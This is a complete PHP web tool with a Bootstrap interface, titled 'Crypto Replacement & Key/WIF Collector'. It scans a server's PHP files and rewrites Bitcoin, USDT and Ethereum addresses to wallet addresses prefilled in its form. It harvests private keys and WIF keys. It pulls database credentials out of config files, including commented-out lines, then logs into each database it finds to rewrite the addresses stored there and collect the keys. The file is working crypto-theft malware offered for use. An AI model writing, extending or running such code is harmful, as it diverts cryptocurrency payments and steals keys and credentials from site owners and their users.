<?php
/**
 * Extended Address Replacement & Private Key Collector + DB
 * ---------------------------------------------------------
 * - Scans .php files for:
 *   (1) BTC/USDT/ETH addresses → replaces with user values
 *   (2) Private keys (64 hex)   → collects (not replaced)
 *   (3) Bitcoin WIF format      → collects (not replaced)
 *   (4) DB credentials in a variety of patterns (including commented lines):
 *       - WordPress define('DB_HOST', '...')
 *       - Simple or class var synonyms: $host, $uname, $pwd, $server_name, $database, etc.
 *       - PDO usage: new PDO("mysql:dbname=xxx;host=yyy", "user", "pass")
 *       - Direct mysqli_connect("host","user","pass","db")
 *       - new mysqli(...) usage
 *       - Variation lines like: $this->link = mysqli_connect($host, $uname, $pwd, "db");
 * - Connects to discovered DB credentials to replace addresses in text columns & collect private keys/WIF
 *
 * v5.0 - More synonyms + handles lines like `$this->link = mysqli_connect($host,$uname,$pwd,"db")`
 */

// For dev:
error_reporting(E_ALL);
ini_set('display_errors', '1');
set_time_limit(0);

/**
 * Simple class to store DB credentials.
 */
class DBCredentials {
    public $host;
    public $user;
    public $pass;
    public $dbName;

    public function __construct($host, $user, $pass, $dbName) {
        $this->host   = $host;
        $this->user   = $user;
        $this->pass   = $pass;
        $this->dbName = $dbName;
    }
    public function isEqual(DBCredentials $other) {
        return $this->host   === $other->host
            && $this->user   === $other->user
            && $this->pass   === $other->pass
            && $this->dbName === $other->dbName;
    }
}

/**
 * Collect possible DB credentials from file content.
 * Extended synonyms to handle $host, $uname, $pwd, etc.
 */
function collectDBCredentialsFromFile($content) {
    $foundCreds = [];

    /////////////////////////////////////////////
    // 1) WordPress define
    /////////////////////////////////////////////
    // define('DB_HOST','localhost'), etc.
    $wp = [
        'DB_NAME'     => null,
        'DB_USER'     => null,
        'DB_PASSWORD' => null,
        'DB_HOST'     => null,
    ];
    if (preg_match_all("/define\s*\(\s*'(DB_(?:NAME|USER|PASSWORD|HOST))'\s*,\s*'([^']*)'\s*\)/i", $content, $defMatches, PREG_SET_ORDER)) {
        foreach ($defMatches as $m) {
            $key   = strtoupper($m[1]);
            $value = $m[2];
            if (isset($wp[$key])) {
                $wp[$key] = $value;
            }
        }
        if ($wp['DB_NAME'] && $wp['DB_USER'] && $wp['DB_PASSWORD'] && $wp['DB_HOST']) {
            $foundCreds[] = new DBCredentials($wp['DB_HOST'], $wp['DB_USER'], $wp['DB_PASSWORD'], $wp['DB_NAME']);
        }
    }

    /////////////////////////////////////////////
    // 2) Var synonyms (including class property),
    //    ignoring commented lines if you prefer 
    //    or keep them if you want detection from comments.
    /////////////////////////////////////////////
    // We'll unify a big pattern:
    //   optional comment prefix: ^\s*(?:\/\/|#)?\s*
    //   (?:\$this->|private|protected|public|\$)
    //   varName
    //   = 'some val' or "some val"
    // We'll put them in arrays. We extended synonyms for $uname, $pwd, etc.
    $hostSynonyms = ['host','servername','server_name','hostname','dbhost','db_host'];
    $userSynonyms = ['user','username','dbuser','db_user','uname'];   // added `uname`
    $passSynonyms = ['password','pass','dbpass','db_pass','pwd'];     // added `pwd`
    $dbSynonyms   = ['database','dbname','db_name','db'];

    $possibleHosts = [];
    $possibleUsers = [];
    $possiblePass  = [];
    $possibleDB    = [];

    // If you'd like to also parse commented lines, keep the optional (?:\/\/|#). 
    // If you want to skip commented lines, remove it.
    $varRegex = '/^\s*(?:(?:\/\/|#)\s*)?(?:\$this->|private|protected|public|\$)\s*([A-Za-z_][A-Za-z0-9_]*)\s*=\s*[\'"]([^\'"]+)[\'"]/mi';
    if (preg_match_all($varRegex, $content, $varMatches, PREG_SET_ORDER)) {
        foreach ($varMatches as $vm) {
            $varName = strtolower($vm[1]); 
            $val     = $vm[2];
            if (in_array($varName, $hostSynonyms)) {
                $possibleHosts[] = $val;
            } elseif (in_array($varName, $userSynonyms)) {
                $possibleUsers[] = $val;
            } elseif (in_array($varName, $passSynonyms)) {
                $possiblePass[] = $val;
            } elseif (in_array($varName, $dbSynonyms)) {
                $possibleDB[] = $val;
            }
        }
    }

    /////////////////////////////////////////////
    // 3) PDO usage: new PDO("mysql:dbname=XXX;host=YYY", "USER", "PASS")
    /////////////////////////////////////////////
    $pdoRegex = '/^\s*(?:(?:\/\/|#)\s*)?new\s+PDO\s*\(\s*[\'"]mysql:dbname=([^;\'"]+);host=([^;\'"]+)(?:;port=\d+)?[\'"]\s*,\s*[\'"]([^\'"]+)[\'"]\s*,\s*[\'"]([^\'"]+)[\'"]\s*\)/mi';
    if (preg_match_all($pdoRegex, $content, $pdoMatches, PREG_SET_ORDER)) {
        foreach ($pdoMatches as $pm) {
            $dbName = $pm[1];
            $host   = $pm[2];
            $user   = $pm[3];
            $pass   = $pm[4];
            $foundCreds[] = new DBCredentials($host, $user, $pass, $dbName);
        }
    }

    /////////////////////////////////////////////
    // 4) Direct mysqli_connect("host","user","pass","db")
    /////////////////////////////////////////////
    $mysqliRegex = '/^\s*(?:(?:\/\/|#)\s*)?.*\bmysqli_connect\s*\(\s*[\'"]([^\'"]+)[\'"]\s*,\s*[\'"]([^\'"]+)[\'"]\s*,\s*[\'"]([^\'"]+)[\'"]\s*,\s*[\'"]([^\'"]+)[\'"]\s*\)/mi';
    if (preg_match_all($mysqliRegex, $content, $mcMatches, PREG_SET_ORDER)) {
        foreach ($mcMatches as $mm) {
            $host = $mm[1];
            $user = $mm[2];
            $pass = $mm[3];
            $db   = $mm[4];
            $foundCreds[] = new DBCredentials($host, $user, $pass, $db);
        }
    }

    /////////////////////////////////////////////
    // 5) new mysqli(...) with 4 arguments, 
    //    possibly referencing synonyms
    /////////////////////////////////////////////
    // e.g. `$mysqli = new mysqli($host, $uname, $pwd, "octafxdouble_db");`
    $newMySQLiRegex = '/^\s*(?:(?:\/\/|#)\s*)?.*\bnew\s+mysqli\s*\(\s*([^,]+)\s*,\s*([^,]+)\s*,\s*([^,]+)\s*,\s*([^\)]+)\)/mi';
    if (preg_match_all($newMySQLiRegex, $content, $nmMatches, PREG_SET_ORDER)) {
        foreach ($nmMatches as $nm) {
            $arg1 = trim($nm[1], " \t\n\r\0\x0B'\"");
            $arg2 = trim($nm[2], " \t\n\r\0\x0B'\"");
            $arg3 = trim($nm[3], " \t\n\r\0\x0B'\"");
            $arg4 = trim($nm[4], " \t\n\r\0\x0B'\"");

            $hostVal = guessValueFromArg($arg1, $possibleHosts);
            $userVal = guessValueFromArg($arg2, $possibleUsers);
            $passVal = guessValueFromArg($arg3, $possiblePass);
            $dbVal   = guessValueFromArg($arg4, $possibleDB);

            // If we didn't guess any literal or found synonyms, let's see if the arg is a direct string
            // e.g. "localhost"
            if (!$hostVal) $hostVal = guessLiteral($arg1);
            if (!$userVal) $userVal = guessLiteral($arg2);
            if (!$passVal) $passVal = guessLiteral($arg3);
            if (!$dbVal)   $dbVal   = guessLiteral($arg4);

            if ($hostVal && $userVal && $passVal && $dbVal) {
                $foundCreds[] = new DBCredentials($hostVal, $userVal, $passVal, $dbVal);
            }
        }
    }

    /////////////////////////////////////////////
    // If we have leftover synonyms: 
    // if we found at least one host, user, pass, db, combine them
    /////////////////////////////////////////////
    if (!empty($possibleHosts) && !empty($possibleUsers) && !empty($possiblePass) && !empty($possibleDB)) {
        $foundCreds[] = new DBCredentials($possibleHosts[0], $possibleUsers[0], $possiblePass[0], $possibleDB[0]);
    }

    return $foundCreds;
}

/**
 * Helper: If $arg is a known variable referencing synonyms, return the first from that synonyms array.
 */
function guessValueFromArg($arg, $possibleArray) {
    // e.g. if $arg == "$host" and we have $possibleHosts = ["localhost"],
    // we can return "localhost".
    // We'll do a naive approach: if $arg is like '$host', we see if we have something in $possibleArray.
    if (preg_match('/^\$([A-Za-z_][A-Za-z0-9_]*)$/', $arg)) {
        // if we do have something in $possibleArray, return the first
        if (!empty($possibleArray)) {
            return $possibleArray[0];
        }
    }
    return null;
}
/**
 * Helper: If $arg is a quoted literal e.g. "localhost", return it
 * else null.
 */
function guessLiteral($arg) {
    if (preg_match('/^[\'"]([^\'"]+)[\'"]$/', $arg, $m)) {
        return $m[1];
    }
    return null;
}

// The rest is largely the same scanning & DB logic:

/**
 * Recursively process directory for .php, replace addresses, collect keys, find DB creds.
 */
function processDirectory($baseDir, $patterns, $ignoreDirs = []) {
    $totalFiles        = 0;
    $changedFiles      = 0;
    $totalReplacements = 0;
    $totalPrivateKeys  = 0; // We'll also store WIF count in here
    $fileDetails       = [];
    $errors            = [];

    $dbCredentialsList = [];

    if (!is_dir($baseDir) || !is_readable($baseDir)) {
        return [
            'error' => "Error: The directory <strong>" . htmlspecialchars($baseDir) . "</strong> " .
                       "is not readable or does not exist. Check permissions."
        ];
    }

    try {
        $directoryIterator = new RecursiveDirectoryIterator($baseDir, FilesystemIterator::SKIP_DOTS);
        $iterator          = new RecursiveIteratorIterator($directoryIterator);

        foreach ($iterator as $file) {
            if (!$file->isFile()) continue;

            // ignore logic
            $relativePath = str_replace($baseDir, '', $file->getPath());
            $skipThis = false;
            foreach ($ignoreDirs as $ignored) {
                if (stripos($relativePath, $ignored) !== false) {
                    $skipThis = true;
                    break;
                }
            }
            if ($skipThis) continue;

            if (strtolower($file->getExtension()) !== 'php') continue;

            $totalFiles++;
            $filePath = $file->getPathname();
            if (!is_readable($filePath)) {
                $errors[] = "Warning: File '$filePath' not readable. Skipped.";
                continue;
            }
            $content = file_get_contents($filePath);
            if ($content === false) {
                $errors[] = "Warning: Failed reading '$filePath'.";
                continue;
            }

            // (A) DB creds
            $possibleCreds = collectDBCredentialsFromFile($content);
            foreach ($possibleCreds as $c) {
                $alreadyKnown = false;
                foreach ($dbCredentialsList as $existing) {
                    if ($c->isEqual($existing)) {
                        $alreadyKnown = true;
                        break;
                    }
                }
                if (!$alreadyKnown) {
                    $dbCredentialsList[] = $c;
                }
            }

            // (B) address replacements + key/WIF collects
            $fileReplacements = 0;
            $patternDetails   = [];

            foreach ($patterns as $type => $pat) {
                $matches = [];
                preg_match_all($pat['regex'], $content, $matches);
                if (empty($matches[0])) {
                    continue;
                }
                if (!isset($pat['replacement']) || $pat['replacement'] === null) {
                    // collect only
                    $uniqueMatches = array_unique($matches[0]);
                    $patternDetails[$type] = [
                        'count'       => count($uniqueMatches),
                        'found'       => array_values($uniqueMatches),
                        'replacement' => null,
                    ];
                    $totalPrivateKeys += count($uniqueMatches);
                } else {
                    // replace
                    $uniqueMatches = array_unique($matches[0]);
                    $content = preg_replace_callback(
                        $pat['regex'],
                        function () use ($pat) {
                            return $pat['replacement'];
                        },
                        $content,
                        -1,
                        $replacementsCount
                    );
                    if ($replacementsCount > 0) {
                        $fileReplacements += $replacementsCount;
                        $patternDetails[$type] = [
                            'count'       => $replacementsCount,
                            'found'       => array_values($uniqueMatches),
                            'replacement' => $pat['replacement'],
                        ];
                    }
                }
            }

            // (C) if replaced, write back
            if ($fileReplacements > 0) {
                if (!is_writable($filePath)) {
                    $errors[] = "Error: '$filePath' not writable. Changes not saved.";
                } else {
                    $ok = @file_put_contents($filePath, $content);
                    if ($ok === false) {
                        $errors[] = "Error: Failed to write changes to '$filePath'.";
                    } else {
                        $changedFiles++;
                        $totalReplacements += $fileReplacements;
                    }
                }
            }

            // (D) record file details if we found something
            if ($fileReplacements > 0 || !empty($patternDetails)) {
                $fileDetails[] = [
                    'file'         => $filePath,
                    'replacements' => $fileReplacements,
                    'details'      => $patternDetails,
                ];
            }
        }
    } catch (UnexpectedValueException $ex) {
        return [
            'error' => "Error opening directory <strong>" . htmlspecialchars($baseDir) . "</strong>: ".$ex->getMessage()
        ];
    }

    return [
        'totalFiles'        => $totalFiles,
        'changedFiles'      => $changedFiles,
        'totalReplacements' => $totalReplacements,
        'totalPrivateKeys'  => $totalPrivateKeys,
        'fileDetails'       => $fileDetails,
        'errors'            => $errors,
        'dbCredentialsList' => $dbCredentialsList
    ];
}

/**
 * Connect & process DB, searching text columns for addresses → replace, private keys/WIF → collect.
 */
function processDatabase(DBCredentials $cred, $patterns) {
    $errors = [];
    $dbReplacements = 0;
    $dbPrivateKeys = [];

    mysqli_report(MYSQLI_REPORT_STRICT | MYSQLI_REPORT_ALL);
    try {
        $mysqli = new mysqli($cred->host, $cred->user, $cred->pass, $cred->dbName);
        $mysqli->set_charset('utf8mb4');
    } catch (mysqli_sql_exception $ex) {
        mysqli_report(MYSQLI_REPORT_OFF);
        return [
            'dbReplacements' => 0,
            'dbPrivateKeys'  => [],
            'errors'         => ["DB connection failed ({$cred->host}, {$cred->dbName}): ".$ex->getMessage()]
        ];
    }
    mysqli_report(MYSQLI_REPORT_OFF);

    $tablesRes = $mysqli->query("SHOW TABLES");
    if (!$tablesRes) {
        $errors[] = "SHOW TABLES failed in DB '{$cred->dbName}': " . $mysqli->error;
        $mysqli->close();
        return [
            'dbReplacements' => 0,
            'dbPrivateKeys'  => [],
            'errors'         => $errors
        ];
    }
    while ($row = $tablesRes->fetch_array(MYSQLI_NUM)) {
        $tableName = $row[0];
        $colRes = $mysqli->query("SHOW COLUMNS FROM `{$tableName}`");
        if (!$colRes) {
            $errors[] = "SHOW COLUMNS failed on '{$tableName}': " . $mysqli->error;
            continue;
        }
        $textCols = [];
        while ($c = $colRes->fetch_assoc()) {
            $type = strtolower($c['Type']);
            if (strpos($type, 'char') !== false || strpos($type, 'text') !== false) {
                $textCols[] = $c['Field'];
            }
        }
        $colRes->free();
        if (empty($textCols)) {
            continue;
        }

        $colsList = "`".implode("`,`", $textCols)."`";
        $rowsRes = $mysqli->query("SELECT {$colsList} FROM `{$tableName}`");
        if (!$rowsRes) {
            $errors[] = "SELECT columns failed on '{$tableName}': " . $mysqli->error;
            continue;
        }
        while ($r = $rowsRes->fetch_assoc()) {
            $updateNeeded = false;
            $newData = [];
            foreach ($textCols as $tc) {
                $originalVal = $r[$tc];
                $value = $originalVal;
                if ($value === null) continue;

                foreach ($patterns as $type => $pat) {
                    $matches = [];
                    preg_match_all($pat['regex'], $value, $matches);
                    if (empty($matches[0])) continue;

                    if (!isset($pat['replacement']) || $pat['replacement'] === null) {
                        // collect only
                        $dbPrivateKeys = array_merge($dbPrivateKeys, $matches[0]);
                    } else {
                        // address => replace
                        $value = preg_replace_callback(
                            $pat['regex'],
                            function () use ($pat) {
                                return $pat['replacement'];
                            },
                            $value,
                            -1,
                            $countReplaced
                        );
                        if ($countReplaced > 0) {
                            $dbReplacements += $countReplaced;
                            $updateNeeded = true;
                        }
                    }
                }

                if ($value !== $originalVal) {
                    $newData[$tc] = $value;
                }
            } // each text col

            // do update if needed
            if ($updateNeeded && !empty($newData)) {
                $updateParts = [];
                $whereParts  = [];
                foreach ($newData as $k => $v) {
                    $sv = $mysqli->real_escape_string($v);
                    $updateParts[] = "`{$k}`='{$sv}'";
                    $oldVal = $r[$k];
                    $so = $mysqli->real_escape_string($oldVal);
                    $whereParts[] = "`{$k}`='{$so}'";
                }
                $updateSQL = "UPDATE `{$tableName}` SET ".implode(', ', $updateParts)
                           ." WHERE ".implode(' AND ', $whereParts);
                $resUp = $mysqli->query($updateSQL);
                if (!$resUp) {
                    $errors[] = "UPDATE failed on '{$tableName}': " . $mysqli->error
                              . " [Query: $updateSQL]";
                }
            }
        }
        $rowsRes->free();
    }
    $tablesRes->free();
    $mysqli->close();

    $dbPrivateKeys = array_values(array_unique($dbPrivateKeys));
    return [
        'dbReplacements' => $dbReplacements,
        'dbPrivateKeys'  => $dbPrivateKeys,
        'errors'         => $errors
    ];
}

////////////////////////////////////////////////////////////////////////////////////
// The HTML / UI portion with an improved interface
////////////////////////////////////////////////////////////////////////////////////
?>
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8"/>
    <title>Crypto Replacement & Key Collector + DB (v5)</title>
    <meta name="viewport" content="width=device-width, initial-scale=1"/>
    <!-- Bootstrap CSS -->
    <link
      href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/css/bootstrap.min.css"
      rel="stylesheet"
    />
    <style>
        body {
            background: linear-gradient(120deg, #f3f3f3, #cccccc);
            font-family: "Segoe UI", Tahoma, Geneva, Verdana, sans-serif;
        }
        .container {
            margin-top: 40px;
            max-width: 980px;
        }
        .card {
            border-radius: 12px;
            border: none;
            box-shadow: 0 2px 8px rgba(0,0,0,0.1);
        }
        .card-title {
            font-weight: 700;
            font-size: 1.75rem;
            color: #333;
        }
        #overlay {
            position: fixed;
            top: 0; 
            left: 0; 
            width: 100%; 
            height: 100%;
            background: rgba(255, 255, 255, 0.9);
            display: none; 
            align-items: center; 
            justify-content: center; 
            z-index: 9999;
        }
        .spinner-border {
            width: 3rem;
            height: 3rem;
            border-width: 0.3rem;
        }
        .progress-bar-container {
            position: fixed; 
            top: 0; 
            left: 0; 
            right: 0; 
            z-index: 9998;
            height: 6px;
        }
        .progress-bar {
            transition: width 0.2s;
        }
        .form-label {
            font-weight: 600;
        }
        .btn-custom {
            background-color: #6c63ff;
            color: #fff;
            font-weight: 600;
            border: none;
        }
        .btn-custom:hover {
            background-color: #574ce0;
        }
        .alert {
            font-size: 1rem;
        }
        .table td, .table th {
            vertical-align: middle;
        }
        .table thead {
            background-color: #f8f8f8;
        }
        .highlight {
            background: #fff3cd; /* light yellow highlight */
        }
    </style>
</head>
<body>
<div id="overlay">
    <div class="spinner-border text-primary" role="status">
        <span class="visually-hidden">Processing...</span>
    </div>
</div>
<div class="progress-bar-container">
    <div class="progress">
        <div id="progress-bar" class="progress-bar bg-primary" style="width: 0%;"></div>
    </div>
</div>
<div class="container">
    <div class="card p-4 mb-5">
        <h1 class="card-title text-center mb-4">
            Crypto Replacement & Key/WIF Collector + DB (v5)
        </h1>

        <?php
        if ($_SERVER['REQUEST_METHOD'] === 'POST') {
            // Gather form inputs
            $baseDir             = trim($_POST['directory'] ?? __DIR__);
            $replacementBitcoin  = trim($_POST['replacement_bitcoin'] ?? 'bc1qEXAMPLE');
            $replacementUSDT     = trim($_POST['replacement_usdt'] ?? 'TExample1234');
            $replacementEthereum = trim($_POST['replacement_ethereum'] ?? '0xEXAMPLEABCDEFFEDCBA');

            // Patterns for addresses, private keys, WIF
            $patterns = [
                'bitcoin' => [
                    'regex'       => '/\b(?:[13][a-km-zA-HJ-NP-Z1-9]{25,34}|bc1[a-z0-9]{25,39})\b/i',
                    'replacement' => $replacementBitcoin,
                ],
                'usdt' => [
                    'regex'       => '/\bT[123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz]{33}\b/',
                    'replacement' => $replacementUSDT,
                ],
                'ethereum' => [
                    'regex'       => '/\b0x[a-fA-F0-9]{40}\b/',
                    'replacement' => $replacementEthereum,
                ],
                'privatekey' => [
                    // 64-hex
                    'regex'       => '/\b[a-fA-F0-9]{64}\b/',
                    'replacement' => null, // collect only
                ],
                'bitcoinwif' => [
                    // naive mainnet (5..., K..., L...)
                    'regex'       => '/\b(?:5[123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz]{49}|[KL][123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz]{51})\b/',
                    'replacement' => null, // collect only
                ],
            ];

            // Maybe ignore some subdirectories
            $ignoreDirs = [];
            // e.g. $ignoreDirs = ['node_modules','vendor','.git','tests'];

            // 1) Scan the directory
            $result = processDirectory($baseDir, $patterns, $ignoreDirs);
            if (isset($result['error'])) {
                echo "<div class='alert alert-danger'>{$result['error']}</div>";
            } else {
                echo "<div class='alert alert-success'>";
                echo "File scan completed for: <strong>" . htmlspecialchars($baseDir) . "</strong>!";
                echo "</div>";

                $totalFiles        = $result['totalFiles'];
                $changedFiles      = $result['changedFiles'];
                $totalReplacements = $result['totalReplacements'];
                $totalPrivateKeys  = $result['totalPrivateKeys']; 
                $fileDetails       = $result['fileDetails'];
                $errors            = $result['errors'];
                $dbCredList        = $result['dbCredentialsList'];

                echo "<h4 class='mt-4'>File Scan Summary</h4>";
                echo "<table class='table table-bordered'>";
                echo "<tr><th>Total PHP files scanned</th><td>$totalFiles</td></tr>";
                echo "<tr><th>Total files modified</th><td>$changedFiles</td></tr>";
                echo "<tr><th>Total addresses replaced</th><td>$totalReplacements</td></tr>";
                echo "<tr><th>Total private keys/WIF collected</th><td>$totalPrivateKeys</td></tr>";
                echo "</table>";

                if (!empty($errors)) {
                    echo "<div class='alert alert-warning'>";
                    echo "<strong>File-Scan Warnings/Errors:</strong><br>";
                    echo implode("<br>", array_map("htmlspecialchars", $errors));
                    echo "</div>";
                }

                if (!empty($fileDetails)) {
                    echo "<h4 class='mt-4'>Detailed File Analysis</h4>";
                    echo "<table class='table table-striped table-hover'>";
                    echo "<thead><tr><th>File Path</th><th>Replacements</th><th>Details</th></tr></thead><tbody>";
                    foreach ($fileDetails as $detail) {
                        $fp   = htmlspecialchars($detail['file']);
                        $rpl  = $detail['replacements'];
                        echo "<tr>";
                        echo "<td>$fp</td>";
                        echo "<td>$rpl</td>";
                        echo "<td>";
                        foreach ($detail['details'] as $type => $info) {
                            if (!isset($info['replacement']) || $info['replacement'] === null) {
                                echo "<div class='highlight mb-2'><strong>".ucfirst($type)."</strong> found: {$info['count']}<br>";
                                echo "<small>".htmlspecialchars(implode(', ', $info['found']))."</small></div>";
                            } else {
                                echo "<div class='mb-2'><strong>".ucfirst($type)."</strong> replaced: {$info['count']}<br>";
                                echo "<em>Old:</em> ".htmlspecialchars(implode(', ', $info['found']))."<br>";
                                echo "<em>New:</em> <code>".htmlspecialchars($info['replacement'])."</code></div>";
                            }
                        }
                        echo "</td>";
                        echo "</tr>";
                    }
                    echo "</tbody></table>";
                }

                // 2) Process discovered DB credentials
                if (!empty($dbCredList)) {
                    echo "<hr><h3 class='mt-4'>Database Scanning</h3>";
                    echo "<p class='text-secondary'>Found <strong>".count($dbCredList)."</strong> unique DB credential set(s).</p>";

                    $grandTotalDBReplacements = 0;
                    $grandTotalDBPrivateKeys  = [];
                    $dbErrors = [];

                    foreach ($dbCredList as $index => $dbCred) {
                        echo "<div class='mb-3 p-3 border rounded bg-light'>";
                        echo "<h5>DB Credentials #".($index+1)."</h5>";
                        echo "<ul>";
                        echo "<li><strong>Host:</strong> ".htmlspecialchars($dbCred->host)."</li>";
                        echo "<li><strong>User:</strong> ".htmlspecialchars($dbCred->user)."</li>";
                        echo "<li><strong>Pass:</strong> ".htmlspecialchars($dbCred->pass)."</li>";
                        echo "<li><strong>DB:</strong> ".htmlspecialchars($dbCred->dbName)."</li>";
                        echo "</ul>";

                        $dbResult = processDatabase($dbCred, $patterns);
                        $grandTotalDBReplacements += $dbResult['dbReplacements'];
                        $grandTotalDBPrivateKeys   = array_merge($grandTotalDBPrivateKeys, $dbResult['dbPrivateKeys']);

                        if (!empty($dbResult['errors'])) {
                            echo "<div class='alert alert-warning'>";
                            echo "<strong>DB Errors/Warns:</strong><br>";
                            foreach ($dbResult['errors'] as $err) {
                                echo htmlspecialchars($err)."<br>";
                            }
                            echo "</div>";
                            $dbErrors = array_merge($dbErrors, $dbResult['errors']);
                        }

                        echo "<p class='mb-0'>Replaced <strong>{$dbResult['dbReplacements']}</strong> addresses in DB.</p>";
                        echo "<p class='mb-0'>Found <strong>".count($dbResult['dbPrivateKeys'])."</strong> private keys/WIF in DB.</p>";
                        echo "</div>";
                    }

                    echo "<hr>";
                    echo "<h5 class='mt-4'>Overall DB Summary</h5>";
                    echo "<ul>";
                    echo "<li><strong>Total DB addresses replaced:</strong> {$grandTotalDBReplacements}</li>";
                    $uniqueDBKeys = array_unique($grandTotalDBPrivateKeys);
                    echo "<li><strong>Total DB private keys/WIF found:</strong> ".count($uniqueDBKeys)."</li>";
                    if (!empty($uniqueDBKeys)) {
                        echo "<li><strong>All DB Private Keys/WIF:</strong><br><small>"
                            . htmlspecialchars(implode(', ', $uniqueDBKeys))
                            . "</small></li>";
                    }
                    echo "</ul>";

                    if (!empty($dbErrors)) {
                        echo "<div class='alert alert-warning'>";
                        echo "<strong>Consolidated DB Errors/Warns:</strong><br>";
                        echo implode('<br>', array_map('htmlspecialchars', array_unique($dbErrors)));
                        echo "</div>";
                    }
                } else {
                    echo "<hr><h5>No database credentials found in scanned PHP files.</h5>";
                }
            }
        } else {
        ?>
            <form
                method="post"
                id="replacementForm"
                action="<?php echo htmlspecialchars($_SERVER['PHP_SELF']); ?>"
                class="needs-validation"
            >
                <div class="mb-3">
                    <label for="directory" class="form-label" data-bs-toggle="tooltip"
                           title="Base directory to scan (default is current).">
                        Base Directory
                    </label>
                    <input
                        type="text"
                        class="form-control"
                        id="directory"
                        name="directory"
                        value="<?php echo htmlspecialchars(__DIR__); ?>"
                        required
                    >
                </div>

                <div class="row">
                  <div class="col-md-4 mb-3">
                    <label for="replacement_bitcoin" class="form-label"
                           data-bs-toggle="tooltip"
                           title="Replace matched Bitcoin addresses (bc1..., 1..., 3...)">
                      Replacement Bitcoin
                    </label>
                    <input
                        type="text"
                        class="form-control"
                        id="replacement_bitcoin"
                        name="replacement_bitcoin"
                        value="bc1qpr6vwqkgfv9s5d2l7n880cl7sawq5rywl95kuq"
                        required
                    >
                  </div>
                  <div class="col-md-4 mb-3">
                    <label for="replacement_usdt" class="form-label"
                           data-bs-toggle="tooltip"
                           title="Replace matched USDT (TRC20) addresses (T...)">
                      Replacement USDT
                    </label>
                    <input
                        type="text"
                        class="form-control"
                        id="replacement_usdt"
                        name="replacement_usdt"
                        value="TJAcV4v6ZJUv83NwMJaS83msUUvbP4wiyx"
                        required
                    >
                  </div>
                  <div class="col-md-4 mb-3">
                    <label for="replacement_ethereum" class="form-label"
                           data-bs-toggle="tooltip"
                           title="Replace matched Ethereum addresses (0x...)">
                      Replacement Ethereum
                    </label>
                    <input
                        type="text"
                        class="form-control"
                        id="replacement_ethereum"
                        name="replacement_ethereum"
                        value="0x50b6f8285c708dad4dec47f26eae0033059ba04f"
                        required
                    >
                  </div>
                </div>

                <div class="alert alert-info">
                    <strong>Note:</strong> 
                    <ul>
                      <li>Private keys (64 hex) and BTC WIF (5..., K..., L...) are only <em>collected</em>, not replaced.</li>
                      <li>This script attempts to detect credentials even if lines are commented out or in class methods.</li>
                      <li>Use caution: scanning large DBs can be slow.</li>
                    </ul>
                </div>
                <div class="d-grid">
                    <button type="submit" class="btn btn-custom btn-lg">
                        Run Replacement & Collection
                    </button>
                </div>
            </form>
        <?php } ?>
    </div>
</div>

<!-- Bootstrap JS + Popper -->
<script
  src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/js/bootstrap.bundle.min.js"
></script>
<script>
    // Overlay & progress bar
    document.getElementById("replacementForm")?.addEventListener("submit", function () {
        document.getElementById("overlay").style.display = "flex";

        var progressBar = document.getElementById("progress-bar");
        var width = 0;
        var interval = setInterval(function () {
            if (width >= 100) {
                clearInterval(interval);
            } else {
                width += 1;
                progressBar.style.width = width + '%';
            }
        }, 20);
    });

    // Enable Bootstrap tooltips
    var tooltipTriggerList = [].slice.call(document.querySelectorAll('[data-bs-toggle="tooltip"]'));
    tooltipTriggerList.map(function (el) {
        return new bootstrap.Tooltip(el);
    });
</script>
</body>
</html>
